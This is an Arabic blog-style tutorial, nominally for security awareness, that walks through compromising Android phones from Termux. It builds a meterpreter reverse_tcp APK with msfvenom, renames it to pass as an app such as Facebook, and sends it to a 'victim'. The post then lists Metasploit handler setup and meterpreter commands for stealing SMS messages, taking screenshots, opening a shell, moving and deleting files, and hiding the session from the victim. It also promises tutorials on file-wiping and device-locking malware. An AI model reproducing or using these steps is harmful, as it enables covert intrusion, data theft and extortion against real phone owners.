شرح اختبار اختراق هواتف الاندرويد لحماية جهازك؟ من الهاتف بستخدام Termux

شرح اختراق هواتف الاندرويد بستخدام الهاتف

مرحبا بكم متابعي موقع 'محترف المعلومات' شرح اختراق هواتف الاندرويد بستخدام الهاتفشرح انا تاخرة كثير عل شرح هاذا الشرح بسبب قلة الدعم بلمشاركة مع الاخرين ثانين الخوف من استخدام ضد ناس ابريئ او تهدديد والابتزاز .. ولكن انا بشرحة لتوعية الامنية ثانيا اذا وقعت مشكلة او ابتزاز لشخص يمكن استعمالها ضدو والان ..''اذا استفادة من الشرح شارك المنشور '' لكي نستمر بتقديم افضل من هاذي الطرق .. تقدر تستخدم الشرح من الهاتف او الكالي لينيكس

نبدا الشرح:

اولآ :قم بتثبيت تطبيق Termux

تحميل termux

بعد تثبيت تطبيق termux رح توجه بعض المشكلات فلهاذا رح اترك لكم اومر لاتفادي المشاكل قم بنسخة الامر الاول وضعو في termux وثم تاخذ الثاني وتلصق في termux وهكذا...

اومر حل مشاكل termux

ثانيآ: تثبيت اداة TmX-FW

بعد اكمال اومر حل مشاكل termux ناتي للخطوة الثانية تثبيت اداة Tmx-FW والذي من خلالها رح نثبيت مشروع 'metasploit-framework' الميتسبلويت

اومر تثبيت اداة TmX-FW

انسخ الاومر وضعها في termux

1- apt update

2- apt upgrade

git clone

https://github.com/MoMuilWH/TmX-FW

4- cd TmX-FW

5- ls

6- chmod +x *

7- ls

8- python2 TmX-FW.py

من تكمل يطلعلك قائمه حط رقم 12

وبعدين يدخلك القائمة فرعية ضع الرقم 5

بعدها رح يبدل التنزيل رح تاخذ وقت طويل لمن تتنزل حسب سرعة الانترنت المتوفر لديك وتاكد من افرغ مساحة في جهازك عشان متوجه مشاكل افرغ عل اقل 2 جيجا لتكون الخطوة بدون مشاكل .. استغرق الوقت التثبيت عندي 45 دقيقة حسب سرعة الانترنت عندك

ثالثآ : بعد تثبيت مشروع الميتسبلويت

افتح نافذة جديد في termux واكتب امر صنع بيلود

msfvenom -p android/meterpreter/reverse_tcp LHOST=★★★★★ LPORT=4444 R > /sdcard/termux.apk

مكان النجوم ضع الايبي تبعك .. طريق معرفة الايبي اذا كنت تريد اختراق شخص خارج الشبكه ضع الايبي الخارجي اذا دخل الشبكة ضع الايبي ادخلي

طريقة معرفة الايبي الدخلي افتح نافذة جديد وضع الامر

ifconfig

الايبي هو الرقم المحدد فقط بصور رح تنسخ الايبي وتضع مكان النجوم

وفي نهاية الامر مكتوب termux.apk

تقدر تغير كلمة termux باسم اخر مثلن Facebook او اي اسم ولكن لاتنسى ان تضع.apk بعد الاسم

ثالثآ: استخدام مشروع 'metasploit-framework'

بعد عمل البيلود رح ينحفظ في في الذكره الدخلية للجهاز

رح تجدو بنفس الاسم الذي وضعتو هاذا التطبيق او البيلود ارسله للضحيه الي بدك تخترقه

بعد مايثبته بجواله ويفتح ناتي الاستغلال اكمل الشرح وخذ الاومر

امر تشغيل مشروع الميتسبلويت رح يكون بلامر msfconsole

حتى اذا خرجت من التطبيق وحبيت تفتحة اكتب فقط امر msfconsole رح تخذ ثواني وتفتح الان

نفتح الميتسبلويت ونكتب الاومر التالية:

1- use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

3- رح تحط هنا الايبي set lhost

4- set lport 4444

الان اذا كان الضحية قد ثبت التطبيق وفتحو سوي الامر التالي

exploit

رح يبدا الاستغلال انتظر اذا طلعت كلمة meterpreter

فانت الان في جهاز الضحية ويمكن اتحكم بلجهاز كليا اكتب امر ls لاضهار ملفات الضحيه

خامسً: اومر التحكم بلجهاز

عندما تكون في الستغلال اكتب الامر help رح يضهرلك كل الذي يمكن تسويه بجهار الضحية

كما موضح بصوره الجهى اليمنى المحدد هي وصف الامر ووظيفتة وفي الجهى اليسرا امر اتنفيذ رح تقدر تستخدمة بنفسك كا مثال اذا كتبت الامر dump_sms فسيتم سحب جميع الرسال الموجود في جهاز الضحيه سيتم حفضها في termux. بل home باسم dump sms وتقدر تفتحه بترميكس ولكن ترميكس

لايدعم العربي لكي تشوفها بوضوح انقلها يبللام mv sms بدل sms بي اسم الملف حق الرسال وهاذي معظم الاومر 👇

----------------------------------------------------------------- اوامر التحكم في الضحيه

لأعادة تشغيل جهاز الضحية : reboot

------------------------------------------------------------

لاطفاء جهاز الضحية : shutdown

------------------------------------------------------------

لاضهار معلومات حول نضام الضحية مثل نضام تشغيل و لغة : sysinfo

------------------------------------------------------------

لألتقاط صورة من شاشة الضحية : screenshot

------------------------------------------------------------

لاضهار اتصلات الشبكة وجميع البرامج و الملفات المتصلة بالانترنت و مستهلكة للانترنت : netstat

------------------------------------------------------------

للدخول الي الملفات الداخليه و كتابة الاوامر كأنك في جهاز الضحية : shell

------------------------------------------------------------

لاقلاع اي برنامج علي جهاز الضحية بامر واحد منك : execute -f mc.apk

طبعا غير mc الي اسم البرنامج الذي تريده ان يشتغل

------------------------------------------------------------

لاضهار جميع البرامج التي تشتغل في جهاز الضحية اكتب : ps

------------------------------------------------------------

لرفع اي ملف من عندك الي جهاز الضحية : مثال : upload /sdcard/doda.apk \doda.apk

استبدل doda باسم الملف او التطبيق او اي شئ تريد رفعه

طبعا هذا بعد الدخول الي مكان التطبيق او الصوره او اي شئ وطبعا لدخول اللي ملفات الضحيه اطلب الامر

cd /sdcard

------------------------------------------------------------

لتحميل اي ملف او صورة ... من جهاز الضحية الي جهازك : download doda.apk

غير doda الي اسم الملف و ايضا صيغة apk الي صيغة الملف

طبعا هذا بعد الدخول الي مكان التطبيق او الصوره او اي شئ وطبعا لدخول اللي ملفات الضحيه اطلب الامر

cd /sdcard

------------------------------------------------------------

اوامر مهمه

اولا هذا الامر

بعد دخولك مباشر علي الضحيه cd /sdcard

sdcard : هذا مكان الذاكره الداخليه

اما اذا طلبت cd /sdcard1

sdcard1: هذا مكان الذاكره الخارجيه

اما معني cd

هذا الامر للتنقل بين الملفات : cd

يمكنك ان تكتب .. cd للرجوع الي الوراء

وايضا للدخول لملف cd file للذهاب و تنقل الي ملف اخر

قم باستبدال file ب اسم الملف الذي تريد ذهاب اليه

اما هذا الامر pwd هذا يبين لك اسم المكان الذي تتواجد به من البدايه للنهايه

مثال ...\...\...\...\...\

وايضا هذا الامر ls يظهر لك الملفات الموجودة و اين انت

وايضا Ctrl+l هذا لمسح الكلام الذي يتواجد في الشاشه

------------------------------------------------------------

هذا الامر لحذف اي ملف : rm doda

قم باستبدال doda الي الملف او برنامج او صورة الذي تريد ان تحذفها

------------------------------------------------------------

لاغلاق الجلسة الاختراق لفترة معينة من الزمن طبعا هذا مهم حتي لا يشك الضحية ... : sleep 5

غير 5 ... للوقت الذي تريد

-----------------------

والان انتهاء الشرح لاتبخل علينا بي مشاركة هاذى المنشور وتقدير لاجهود وكذلك اذا وجهتك مشكلة لاتتردد بطرح مشكلتك وكذلك اذا كنت تريد شرح معين اكتب في التعليقات

ملاحظة هامة:

هاذا الاختراق اختراق داخلي ولايمكنك تجربة خارج الشبكه غير بعد فتح بورت 4444 وانا لم اشرح فتح البورت لاني طولت بشرح كثير اذا كانتو تريدو الاختراق خارجي فكتب تعليق للحلقة القادم هل اختراق خارجي او صنع فيروس قفل جهاز الضحية او فيروس مسح كل ملفات الضحية ...وسلام